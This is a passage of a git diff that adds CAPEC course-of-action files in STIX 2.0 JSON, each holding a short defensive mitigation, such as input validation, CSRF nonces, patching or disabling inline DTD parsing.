"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32.json b/capec/course-of-action/course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32.json new file mode 100644 index 0000000000..c39c041376 --- /dev/null +++ b/capec/course-of-action/course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--83f518b1-28b5-4796-bc85-be82413792fd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-640-5", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20.json b/capec/course-of-action/course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20.json new file mode 100644 index 0000000000..e803be5077 --- /dev/null +++ b/capec/course-of-action/course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7df7de50-cf56-4ec2-b1df-bffe355f5c21", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-609-0", + "description": "Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93.json b/capec/course-of-action/course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93.json new file mode 100644 index 0000000000..bf94db493c --- /dev/null +++ b/capec/course-of-action/course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--13179c8c-1102-405a-8c00-963e2f7fd323", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-105-1", + "description": "If possible, make use of SSL.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003.json b/capec/course-of-action/course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003.json new file mode 100644 index 0000000000..7455af92d9 --- /dev/null +++ b/capec/course-of-action/course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--75e5bc1b-dfaf-4566-bfcd-a9deac1ad4d8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-13-0", + "description": "Protect environment variables against unauthorized read and write access.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9.json b/capec/course-of-action/course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9.json new file mode 100644 index 0000000000..9d913b2e2a --- /dev/null +++ b/capec/course-of-action/course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4dd98ac9-d96e-4080-a3f8-379b5f89db48", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-5", + "description": "Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526.json b/capec/course-of-action/course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526.json new file mode 100644 index 0000000000..4d7d0c8875 --- /dev/null +++ b/capec/course-of-action/course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--44aa6664-3c01-410c-86de-b216a5e3d18a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-199-5", + "description": "Implementation: Perform output validation for all remote content.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56.json b/capec/course-of-action/course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56.json new file mode 100644 index 0000000000..e00e8f62c6 --- /dev/null +++ b/capec/course-of-action/course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--06dff10c-1ec0-4b39-914b-856c6d93eb1a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-72-5", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--12149275-8476-4bee-923b-b2677b531ca2.json b/capec/course-of-action/course-of-action--12149275-8476-4bee-923b-b2677b531ca2.json new file mode 100644 index 0000000000..a8c0cadd04 --- /dev/null +++ b/capec/course-of-action/course-of-action--12149275-8476-4bee-923b-b2677b531ca2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b9977147-893b-400e-9c99-ecc76cb16a20", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--12149275-8476-4bee-923b-b2677b531ca2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-447-0", + "description": "Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a.json b/capec/course-of-action/course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a.json new file mode 100644 index 0000000000..ee369e7ac4 --- /dev/null +++ b/capec/course-of-action/course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8544517e-85fb-408c-ba38-d9cbfd1e6df6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-88-0", + "description": "Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97.json b/capec/course-of-action/course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97.json new file mode 100644 index 0000000000..403338d718 --- /dev/null +++ b/capec/course-of-action/course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7848ce34-a24e-41a9-b258-00eb6bd23184", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-112-1", + "description": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--13872a21-011c-46a9-a2b3-e68f5b91dd65.json b/capec/course-of-action/course-of-action--13872a21-011c-46a9-a2b3-e68f5b91dd65.json new file mode 100644 index 0000000000..5006ddce18 --- /dev/null +++ b/capec/course-of-action/course-of-action--13872a21-011c-46a9-a2b3-e68f5b91dd65.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--60d955ff-4e98-4e16-a00c-15fdcadd2073", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--13872a21-011c-46a9-a2b3-e68f5b91dd65", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-549-2", + "description": "Regularly patch all software.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--13b80a43-a746-4d74-af3f-22e3e8109106.json b/capec/course-of-action/course-of-action--13b80a43-a746-4d74-af3f-22e3e8109106.json new file mode 100644 index 0000000000..6ec39e37c1 --- /dev/null +++ b/capec/course-of-action/course-of-action--13b80a43-a746-4d74-af3f-22e3e8109106.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4f701d87-5dfc-4ebf-b843-ece7cf920e62", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--13b80a43-a746-4d74-af3f-22e3e8109106", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-275-0", + "description": "Design: IP Pinning causes browsers to record the IP address to which a given name resolves and continue using this address regardless of the TTL set in the DNS response. Unfortunately, this is incompatible with the design of some legitimate sites.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f.json b/capec/course-of-action/course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f.json new file mode 100644 index 0000000000..055b552fd6 --- /dev/null +++ b/capec/course-of-action/course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b9a60204-9088-4aed-9c63-c8cb66088275", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-15-1", + "description": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--14767fc9-6805-46f8-b31b-17dbece67e4d.json b/capec/course-of-action/course-of-action--14767fc9-6805-46f8-b31b-17dbece67e4d.json new file mode 100644 index 0000000000..3cc1b11250 --- /dev/null +++ b/capec/course-of-action/course-of-action--14767fc9-6805-46f8-b31b-17dbece67e4d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--69153f11-e710-45a2-b1a8-96b141e3a1e2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--14767fc9-6805-46f8-b31b-17dbece67e4d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-174-0", + "description": "User input must be sanitized according to context before reflected back to the user. The JavaScript function 'encodeURI' is not always sufficient for sanitizing input intended for global Flash parameters. Extreme caution should be taken when saving user input in Flash cookies. In such cases the Flash file itself will need to be fixed and recompiled, changing the name of the local shared objects (Flash cookies).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf.json b/capec/course-of-action/course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf.json new file mode 100644 index 0000000000..13fbb351cc --- /dev/null +++ b/capec/course-of-action/course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d685743d-60d5-4263-adc1-48a3b92f9d0d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-131-2", + "description": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6.json b/capec/course-of-action/course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6.json new file mode 100644 index 0000000000..ccf1e5fba0 --- /dev/null +++ b/capec/course-of-action/course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3069da3b-d7b0-47b6-8382-dc01673e5faa", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-0", + "description": "Implementation: Obfuscate server fields of HTTP response.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd.json b/capec/course-of-action/course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd.json new file mode 100644 index 0000000000..cb96e7ad7c --- /dev/null +++ b/capec/course-of-action/course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--65679cac-50d1-4e0c-80d9-1d067c3246bc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-197-1", + "description": "Implementation: Disable altogether the use of inline DTD schemas in your XML parsing objects. If must use DTD, normalize, filter and white list and parse with methods and routines that will detect entity expansion from untrusted sources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6.json b/capec/course-of-action/course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6.json new file mode 100644 index 0000000000..5412c8c8ef --- /dev/null +++ b/capec/course-of-action/course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--44f09773-9bcf-4096-8cee-aac7cd13ec6d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-3", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96.json b/capec/course-of-action/course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96.json new file mode 100644 index 0000000000..80d4412d45 --- /dev/null +++ b/capec/course-of-action/course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--10a6215f-a6a5-49b4-98bb-052887b7aeb7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-212-1", + "description": "When implementing security features, consider how they can be misused and compromised.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1.json b/capec/course-of-action/course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1.json new file mode 100644 index 0000000000..192a89455f --- /dev/null +++ b/capec/course-of-action/course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--52fb3027-54ec-4a40-9cd8-71b226ac9673", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-636-0", + "description": "Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--166fe84f-a603-45c3-99ba-785be6639265.json b/capec/course-of-action/course-of-action--166fe84f-a603-45c3-99ba-785be6639265.json new file mode 100644 index 0000000000..daa2ff5edd --- /dev/null +++ b/capec/course-of-action/course-of-action--166fe84f-a603-45c3-99ba-785be6639265.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--512d3e2d-421e-4984-a5fc-7bcdde6dbbd8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--166fe84f-a603-45c3-99ba-785be6639265", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-618-0", + "description": "Frequent changing of mobile number.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0.json b/capec/course-of-action/course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0.json new file mode 100644 index 0000000000..1cd3a78db5 --- /dev/null +++ b/capec/course-of-action/course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a26532a1-1cdc-4ab0-98c0-961a950cd7ff", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-89-0", + "description": "All sensitive information must be handled over a secure connection.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1.json b/capec/course-of-action/course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1.json new file mode 100644 index 0000000000..7da67a9d16 --- /dev/null +++ b/capec/course-of-action/course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a19b42d0-0520-498e-b127-83b215dc6962", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-111-0", + "description": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1782e252-1717-4a56-8f06-144c25768ea0.json b/capec/course-of-action/course-of-action--1782e252-1717-4a56-8f06-144c25768ea0.json new file mode 100644 index 0000000000..8f924b6f66 --- /dev/null +++ b/capec/course-of-action/course-of-action--1782e252-1717-4a56-8f06-144c25768ea0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--db7c54d3-5a4a-4875-9f21-bddcbb03481b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1782e252-1717-4a56-8f06-144c25768ea0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-461-0", + "description": "Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--17b27433-058d-4611-8ea1-bf410322ede5.json b/capec/course-of-action/course-of-action--17b27433-058d-4611-8ea1-bf410322ede5.json new file mode 100644 index 0000000000..ff0d9c2917 --- /dev/null +++ b/capec/course-of-action/course-of-action--17b27433-058d-4611-8ea1-bf410322ede5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--886e542e-5ab2-4036-bd1e-7d8a5ee378ff", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--17b27433-058d-4611-8ea1-bf410322ede5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--181e9016-6187-47ba-aa85-ff726a951dae.json b/capec/course-of-action/course-of-action--181e9016-6187-47ba-aa85-ff726a951dae.json new file mode 100644 index 0000000000..730f3b446a --- /dev/null +++ b/capec/course-of-action/course-of-action--181e9016-6187-47ba-aa85-ff726a951dae.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3e5331f5-fa33-4277-b0a5-4edba01b0f89", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--181e9016-6187-47ba-aa85-ff726a951dae", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-229-0", + "description": "This attack may be mitigated completely by using a parser that is not using a vulnerable container. Mitigation may also limit the number of attributes per XML element.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1834ed8b-031c-4fde-b646-172ad9a8f15d.json b/capec/course-of-action/course-of-action--1834ed8b-031c-4fde-b646-172ad9a8f15d.json new file mode 100644 index 0000000000..3b0b0319ec --- /dev/null +++ b/capec/course-of-action/course-of-action--1834ed8b-031c-4fde-b646-172ad9a8f15d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3cb80ba3-f79b-4d62-aa66-5b2b5d212b07", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1834ed8b-031c-4fde-b646-172ad9a8f15d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-462-0", + "description": "\n Design: The victim's site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests\n Design: The browser's security model could be fixed to not leak timing information for cross domain requests\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2.json b/capec/course-of-action/course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2.json new file mode 100644 index 0000000000..efe325b0f4 --- /dev/null +++ b/capec/course-of-action/course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ce8a5135-8176-4553-9928-d23937a4c1a5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-26-1", + "description": "Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf.json b/capec/course-of-action/course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf.json new file mode 100644 index 0000000000..ef36b3a982 --- /dev/null +++ b/capec/course-of-action/course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0a56041d-2a26-41f3-a8bb-6d13c163fd46", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-95-0", + 